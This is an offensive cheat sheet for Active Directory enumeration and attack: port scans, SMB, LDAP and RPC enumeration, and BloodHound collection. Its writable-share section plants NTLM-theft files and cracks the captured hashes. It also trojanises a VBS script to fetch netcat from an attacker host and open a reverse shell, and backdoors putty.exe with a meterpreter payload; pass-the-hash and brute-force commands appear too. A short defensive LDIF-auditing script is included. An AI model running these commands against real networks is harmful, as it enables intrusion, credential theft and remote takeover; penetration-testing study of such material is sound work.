Enumeration

Map the AD environment: ports, services, SMB shares, LDAP objects, users, groups and BloodHound attack paths. This is where you build the picture needed for everything that follows.


1. Port Scanning

rustscan / nmap
Rustscan → nmap (recommended)
ports=$(rustscan -a $TARGET_IP -r 1-65535 --ulimit 5000 -- -Pn -n \
  | awk '/^Open / {split($2,a,":"); print a[2]}' \
  | paste -sd "," -)
nmap -Pn -p $ports -sV -sC --script vuln -v $TARGET_IP -oN nmap_full.txt
Nmap alternatives
nmap -T4 -A -p- $TARGET_IP -oN nmap_full.txt
nmap -sV -sC -p 53,88,135,139,389,445,464,636,3268,3269,5985,9389 $TARGET_IP
Key AD ports reference
Port            Service                  Attack Opportunities
53              DNS                      Zone transfer, SRV records, domain mapping
80/443          HTTP/HTTPS               Web exploits, credential forms, NTLM auth
88              Kerberos                 AS-REP roasting, Kerberoasting, spraying, delegation, Golden/Silver ticket
123             NTP                      Clock skew fix for Kerberos
135             MSRPC                    WMIEXEC, remote service creation
137–139         NetBIOS                  LLMNR poisoning, NBT-NS poisoning
389             LDAP                     Anonymous bind, user/SPN enum, group mapping, ACL misconfigs
445             SMB                      SYSVOL, GPP passwords, NTLM relay, share enumeration
464             Kerberos (pw change)     AS-REP roasting, Kerberoasting, password spraying
636/3268/3269   LDAPS / Global Catalog   Anonymous bind, user/SPN enum, ACL misconfigs
5985/5986       WinRM                    Evil-WinRM remote shell
9389            AD Web Services          -
47001           WinRM (alt)              Evil-WinRM

2. SMB Enumeration

nxc / smbclient / smbmap
NXC
Unauthenticated — identify host
nxc smb $TARGET_IP/24
nxc smb $TARGET_IP/24 -u '' -p '' --shares
nxc smb $TARGET_IP/24 -u 'guest' -p '' --shares
Authenticated — shares + spider
nxc smb $TARGET_IP/24 -u $USERNAME -p $PASSWORD --shares
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --spider_plus   # index all shares recursively
SMBCLIENT
List shares
smbclient -L //10.10.10.10 -N                          # anonymous
smbclient -L //10.10.10.10 -U 'DOMAIN\username%password'
Browse / download a share
smbclient //10.10.10.10/backup -N
smbclient //10.10.10.10/backup -U 'DOMAIN\username%password'
# inside smb prompt:
prompt off      # no confirmation when downloading
recurse on      # download all files recursively
mget *
Upload a file to a share
smbclient "//$TARGET_IP/admin\$" "$PASSWORD" -U "$DOMAIN\\$USERNAME" -c 'put myservice.exe'   # share, password, then user; admin$ needs local admin rights
NMAP SMB SCRIPTS
nmap --script smb-enum-shares.nse -p445 $TARGET_IP
nmap --script smb-brute -p 445 $TARGET_IP
nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 $TARGET_IP
nmap --script smb-vuln* -p445 $TARGET_IP     # CVE checks (EternalBlue, MS17-010, ...)
SMBMAP
smbmap -H $TARGET_IP                                # anonymous
smbmap -H $TARGET_IP -u $USERNAME -p $PASSWORD      # with credentials
smbmap -H $TARGET_IP -u $USERNAME -p $PASSWORD -R   # recursive
smbmap -H $TARGET_IP -u $USERNAME -p $PASSWORD --download 'share\file.txt'

2.1 Abusing Writable Shares

NTLM capture
Example 1 — ntlm_theft.py
Create all payload types
python3 ~/Tools/ntlm_theft/ntlm_theft.py -g all -s $ATTACKER_IP -f test
Upload to writable share
smbclient //$TARGET_IP/data -U '' -N
put test/test-(icon).url      # inside the smb prompt
Start Responder and catch the NTLMv2 hash
sudo responder -I tun0 -wd
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Example 2 — NXC Slinky
Start Responder first (check Responder.conf for SMB=On)
sudo nano /usr/share/responder/Responder.conf
sudo responder -I eth0 -wd
Create LNK file on share via nxc
nxc smb 192.168.57.198 -d marvel.local -u fcastle -p Password1 \
  -M slinky -o NAME=@important SERVER=192.168.57.70 SHARES=C$ IGNORE=IPC$
Crack captured hash
hashcat -m 5600 hashes/captured.txt /usr/share/wordlists/rockyou.txt
Example 3 — Trojanise existing VBS script
smbclient //$TARGET_IP/share
get script.vbs
put nc64.exe
# edit script.vbs → add:
# CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\ATTACKER_IP\share\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe ATTACKER_IP 1234", 0, True
put script.vbs
nc -lvnp 1234
Example 4 — Replace existing EXE with malicious payload
# Use the same filename as the original
msfvenom -a x64 --platform windows -x putty.exe -k \
  -p windows/meterpreter/reverse_tcp lhost=$ATTACKER_IP lport=4444 \
  -b "\x00" -f exe -o putty.exe
smbclient //$TARGET_IP/share
put putty.exe

3. User & Group Enumeration

nxc / ldap / kerbrute
ENUM4LINUX
enum4linux -a $TARGET_IP    # full scan
enum4linux -U -S $TARGET_IP # fast: users + shares
With credentials
enum4linux -a -u $USERNAME -p $PASSWORD $TARGET_IP    # full (options go before the target, or -u/-p are ignored)
enum4linux -U -S -u username -p password $TARGET_IP # fast
NXC — USERS & GROUPS
Without credentials: RID brute force over a null or guest session
nxc smb $TARGET_IP -u '' -p '' --rid-brute > users.txt
nxc smb $TARGET_IP -u 'guest' -p '' --rid-brute > users.txt
nxc smb $TARGET_IP -u '' -p '' --rid-brute 10000 > users.txt   # raise the RID ceiling above the default
Convert RID output to clean usernames list
grep 'SidTypeUser' users.txt | awk -F'\\\\' '{print $2}' | awk '{print $1}' | grep -v '\$' > usernames.txt
With credentials
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --users
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --users-export users.txt
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --loggedon-users
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --groups
LDAP — users and groups
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --users
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --active-users
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --groups
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --groups 'Domain Admins'
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --password-not-required   # accounts without password
LDAP — without credentials
nxc ldap $TARGET_IP -u '' -p '' --users
nxc ldap $TARGET_IP -u '' -p '' --query "(description=*)" "sAMAccountName description"
Pass-the-Hash auth
nxc smb $TARGET_IP -u $USERNAME -H 'NTLMHASH' --users
nxc smb $TARGET_IP -u $USERNAME -H 'NTLMHASH' --local-auth
USERNAME GENERATION
Generate AD-style usernames from names
python3 username_generator.py -w users.txt > ad_users.txt
LDAPDOMAINDUMP
ldapdomaindump ldap://$DC_IP -o /tmp/dump                                         # anonymous
ldapdomaindump ldaps://$DC_IP -u "$DOMAIN\\$USERNAME" -p "$PASSWORD" -o /tmp/dump
LDAPSEARCH
Anonymous — base dump
ldapsearch -x -H ldap://$TARGET_IP \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" > ldap_dump.txt
With credentials
ldapsearch -x -H ldap://$TARGET_IP \
  -D "$USERNAME@$DOMAIN" -w "$PASSWORD" \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" > ldap_dump.txt
Specific user — group membership
ldapsearch -x -H ldap://$TARGET_IP -D "$USERNAME@$DOMAIN" -w "$PASSWORD" \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" "(sAMAccountName=$USERNAME)" memberOf
Accounts flagged PASSWD_NOTREQD (password not required; userAccountControl bit 0x20, matched with the LDAP bitwise-AND rule)
ldapsearch -x -H ldap://$TARGET_IP -D "$USERNAME@$DOMAIN" -w "$PASSWORD" \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" \
  "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" sAMAccountName userAccountControl
Service accounts (have SPN)
ldapsearch -x -H ldap://$TARGET_IP -D "$USERNAME@$DOMAIN" -w "$PASSWORD" \
  -b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" \
  "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName
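As an added auditor-side example (not part of this cheat sheet), a Python script that parses the LDIF that ldapsearch prints, decodes the userAccountControl bitmask and reports accounts flagged PASSWD_NOTREQD, DONT_REQ_PREAUTH or TRUSTED_FOR_DELEGATION, plus any account with an SPN; the LDIF sample, its domain and its account names are constructed.

```python
import base64
import re
# userAccountControl bits checked here (bit values from Microsoft's documentation of the attribute)
UAC_FLAGS = {0x20: "PASSWD_NOTREQD", 0x80000: "TRUSTED_FOR_DELEGATION", 0x400000: "DONT_REQ_PREAUTH"}
# Constructed sample in the LDIF format ldapsearch prints (not a real dump).
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=svc_sql,CN=Users,DC=corp,DC=local
sAMAccountName: svc_sql
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/sql01.corp.local:1433

dn: CN=jdoe,CN=Users,DC=corp,DC=local
sAMAccountName: jdoe
userAccountControl: 4194848
description:: VGVtcCBhY2NvdW50
"""
def parse_ldif(text):
    """Parse LDIF into [{attr: [values]}]: unfold continuation lines, decode 'attr:: base64'."""
    unfolded = re.sub(r"\n ", "", text)          # a line starting with a space continues the previous one
    entries = []
    for block in re.split(r"\n\s*\n", unfolded):  # blank lines separate entries
        entry = {}
        for line in block.splitlines():
            m = re.match(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$", line)
            if m:                                 # '#' comment lines do not match and are dropped
                attr, sep, value = m.groups()
                if sep == "::":
                    value = base64.b64decode(value).decode("utf-8", "replace")
                entry.setdefault(attr, []).append(value)
        if entry:
            entries.append(entry)
    return entries
def decode_uac(value):
    """Names of the UAC_FLAGS bits set in a userAccountControl value."""
    return sorted(name for bit, name in UAC_FLAGS.items() if int(value) & bit)
def audit(text):
    """sAMAccountName -> findings for accounts with a risky UAC flag or an SPN set."""
    findings = {}
    for e in parse_ldif(text):
        if "sAMAccountName" not in e:             # skips ldapsearch's 'search:'/'result:' trailer block
            continue
        notes = decode_uac(e.get("userAccountControl", ["0"])[0])
        if "servicePrincipalName" in e:
            notes.append("HAS_SPN")
        if notes:
            findings[e["sAMAccountName"][0]] = notes
    return findings
```

Feed it the saved ldap_dump.txt from the commands above with audit(open("ldap_dump.txt").read()); the same flags are what nxc's --password-not-required and the SPN filter select server-side.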
RPCCLIENT
rpcclient -U '' -N $TARGET_IP
rpcclient -U "$USERNAME%$PASSWORD" $TARGET_IP
Useful rpcclient commands
enumdomusers            # all users
enumdomgroups           # all groups
querygroup 0x200        # info on group by RID in hex (0x200 = 512 = Domain Admins)
queryuser 0x1f4         # info on user by RID in hex (0x1f4 = 500 = Administrator)
enumdomains             # list domains
querydominfo            # domain info
getdompwinfo            # password policy
lsaenumsid              # all SIDs
lookupnames admin        # SID of a user
KERBRUTE — User Validation
kerbrute userenum --dc $TARGET_IP -d $DOMAIN usernames.txt -o valid_users.txt
kerbrute userenum --dc $TARGET_IP -d $DOMAIN /usr/share/seclists/Usernames/Names/names.txt

4. BloodHound

bloodhound-python
Collect all data
bloodhound-python -d $DOMAIN -ns $TARGET_IP -u $USERNAME -p $PASSWORD -c ALL --zip
In BloodHound — search for dangerous permissions
# Look for: GenericAll, ForceChangePassword, AllowedToDelegate, ESC1, Unconstrained